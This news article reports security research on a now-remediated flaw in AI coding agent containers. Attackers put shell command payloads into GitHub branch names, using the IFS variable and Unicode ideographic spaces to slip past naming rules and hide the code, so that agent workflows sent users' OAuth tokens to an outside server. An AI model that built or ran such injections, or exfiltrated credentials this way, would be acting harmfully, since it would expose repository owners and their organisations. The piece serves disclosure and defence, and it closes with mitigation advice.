Security researchers have demonstrated a command injection technique that allows attackers to steal GitHub OAuth tokens from AI coding agent containers by manipulating repository branch names.
BeyondTrust Phantom Labs’ latest findings showed how attackers could exploit backend API functionality and container logging processes to access sensitive tokens used by AI coding agents.
By querying backend task history endpoints and reviewing container logs. Researchers retrieved GitHub access tokens by querying backend task history endpoints and reviewing container logs.
After obtaining a single token, the team developed a method to automate token exfiltration across multiple users. This was achieved by modifying GitHub branch names to include shell command injection payloads that execute when processed by the AI agent’s container environment.
The exploit used the Bash Internal Field Separator variable (IFS) as a substitute for literal spaces. This allowed malicious commands to execute despite GitHub naming restrictions.
Unicode Obfuscation Used to Hide Malicious Payloads
To make the attack harder to detect, researchers also demonstrated a payload obfuscation technique using Unicode ideographic space characters (U+3000). These characters were inserted into branch names to hide the malicious command, while still allowing execution in the container environment.
In testing, when users interacted with the malicious branch or triggered automated code review workflows, the container executed the injected command and sent GitHub tokens to an external server controlled by the attacker.
The technique also worked in automated code review environments where AI agents were triggered via pull request comments.
BeyondTrust said the root cause of the vulnerability was insufficient input sanitization when user-controlled data, such as branch names, was passed into shell commands inside agent containers. OpenAI confirmed the flaw has now been remediated.
The research exposed a structural risk in how AI coding agents are deployed: these tools operate as execution environments with direct access to sensitive credentials and organizational repositories, yet input sanitization controls often lag behind their expanding capabilities.
Security experts recommend organizations audit AI agent permissions, enforce least privilege access, monitor repositories for suspicious branch names, rotate tokens regularly, and ensure all user-controlled inputs are sanitized before being passed to command-line environments.
